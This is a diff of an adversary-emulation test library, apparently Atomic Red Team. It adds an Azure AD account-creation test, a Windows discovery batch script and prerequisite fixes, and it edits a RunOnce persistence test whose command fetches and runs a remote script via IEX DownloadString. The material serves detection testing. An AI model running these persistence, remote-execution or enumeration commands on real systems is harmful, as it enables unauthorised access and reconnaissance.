+- [Atomic Test #3 - Azure AD - Create a new user via Azure CLI](#atomic-test-3---azure-ad---create-a-new-user-via-azure-cli)
 
 
 <br/>
@@ -62,7 +64,7 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws
 <br/>
 <br/>
 
-## Atomic Test #2 - Azure AD - Create a new use
+## Atomic Test #2 - Azure AD - Create a new user
 Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
 
 **Supported Platforms:** Azure-ad
@@ -125,4 +127,78 @@ echo "Update the input arguments in the .yaml file so that the userprincipalname
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Azure AD - Create a new user via Azure CLI
+Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 228c7498-be31-48e9-83b7-9cb906504ec8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Display name of the new user to be created in Azure AD | string | atomicredteam|
+| userprincipalname | User principal name (UPN) for the new Azure user being created format email address | String | atomicredteam@yourdomain.com|
+| password | Password for the new Azure AD user being created | string | reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+az login
+$userprincipalname = "#{userprincipalname}"
+$username = "#{username}"      
+$password = "#{password}"
+az ad user create --display-name $username --password $password --user-principal-name $userprincipalname
+az ad user list --filter "displayname eq 'atomicredteam'"
+```
+
+#### Cleanup Commands:
+```powershell
+az ad user delete --id
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if Azure CLI is installed and install manually
+##### Check Prereq Commands:
+```powershell
+az account list
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
+```
+##### Description: Check if Azure CLI is installed and install via PowerShell
+##### Check Prereq Commands:
+```powershell
+az account list
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+```
+##### Description: Update the userprincipalname to meet your requirements
+##### Check Prereq Commands:
+```powershell
+Update the input arguments so the userprincipalname value is accurate for your environment
+```
+##### Get Prereq Commands:
+```powershell
+echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+```
+
+
+
+
 <br/>

atomics/T1136.003/T1136.003.yaml

@@ -26,7 +26,7 @@ atomic_tests:
       aws iam delete-user --user-name #{username}
     name: sh
     elevation_required: false
-- name: Azure AD - Create a new use
+- name: Azure AD - Create a new user
   auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
   description: Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
   supported_platforms:
@@ -63,3 +63,42 @@ atomic_tests:
       New-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName $username      
     cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
     name: powershell
+- name: Azure AD - Create a new user via Azure CLI
+  auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+  description: Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Display name of the new user to be created in Azure AD
+      type: string
+      default: "atomicredteam"
+    userprincipalname:
+      description: User principal name (UPN) for the new Azure user being created format email address
+      type: String
+      default: "atomicredteam@yourdomain.com"
+    password:
+      description: Password for the new Azure AD user being created
+      type: string
+      default: "reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: Check if Azure CLI is installed and install manually
+    prereq_command: az account list
+    get_prereq_command: echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
+  - description: Check if Azure CLI is installed and install via PowerShell
+    prereq_command: az account list
+    get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+  - description: Update the userprincipalname to meet your requirements  
+    prereq_command: Update the input arguments so the userprincipalname value is accurate for your environment
+    get_prereq_command: echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+  executor:
+    command: |-
+      az login
+      $userprincipalname = "#{userprincipalname}"
+      $username = "#{username}"      
+      $password = "#{password}"
+      az ad user create --display-name $username --password $password --user-principal-name $userprincipalname
+      az ad user list --filter "displayname eq 'atomicredteam'"     
+    cleanup_command: az ad user delete --id #{userprincipalname}
+    name: powershell

atomics/T1482/T1482.md

@@ -187,6 +187,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -233,6 +234,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 

atomics/T1482/T1482.yaml

@@ -81,6 +81,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -105,6 +106,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |

atomics/T1547.001/T1547.001.md

@@ -180,7 +180,7 @@ Upon successful execution, a new entry will be added to the runonce item in the
 
 ```powershell
 $RunOnceKey = "#{reg_key_path}"
-set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
 ```
 
 #### Cleanup Commands:
@@ -273,7 +273,8 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
 <br/>
 
 ## Atomic Test #6 - Suspicious bat file run from startup Folder
-bat files can be placed in and executed from the startup folder to maintain persistance.
+bat files can be placed in and executed from the startup folder to maintain persistance
+
 Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
 folder and will also run when the computer is restarted and the user logs in.
 

atomics/T1547.001/T1547.001.yaml

@@ -59,7 +59,7 @@ atomic_tests:
   executor:
     command: |
       $RunOnceKey = "#{reg_key_path}"
-      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
     cleanup_command: |
       Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
     name: powershell
@@ -106,7 +106,8 @@ atomic_tests:
 - name: Suspicious bat file run from startup Folder
   auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
   description: |
-    bat files can be placed in and executed from the startup folder to maintain persistance.
+    bat files can be placed in and executed from the startup folder to maintain persistance
+    
     Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
     folder and will also run when the computer is restarted and the user logs in.
   supported_platforms:

atomics/T1547.001/src/Discovery.bat

@@ -0,0 +1,44 @@
+net user Administrator /domain
+net Accounts
+net localgroup administrators
+net use
+net share
+net group "domain admins" /domain
+net config workstation
+net accounts
+net accounts /domain
+net view
+sc.exe query
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+wmic useraccount list
+wmic useraccount get /ALL
+wmic startup list brief
+wmic share list
+wmic service get name,displayname,pathname,startmode
+wmic process list brief
+wmic process get caption,executablepath,commandline
+wmic qfe get description,installedOn /format:csv
+arp -a
+whoami
+ipconfig /displaydns
+route print
+netsh advfirewall show allprofiles
+systeminfo
+qwinsta
+quser

atomics/used_guids.txt

@@ -1255,3 +1255,5 @@ b8a563d4-a836-4993-a74e-0a19b8481bfe
 99ee161b-dcb1-4276-8ecb-7cfdcb207820
 3a15c372-67c1-4430-ac8e-ec06d641ce4d
 e62d23ef-3153-4837-8625-fa4a3829134d
+228c7498-be31-48e9-83b7-9cb906504ec8
+348f4d14-4bd3-4f6b-bd8a-61237f78b3ac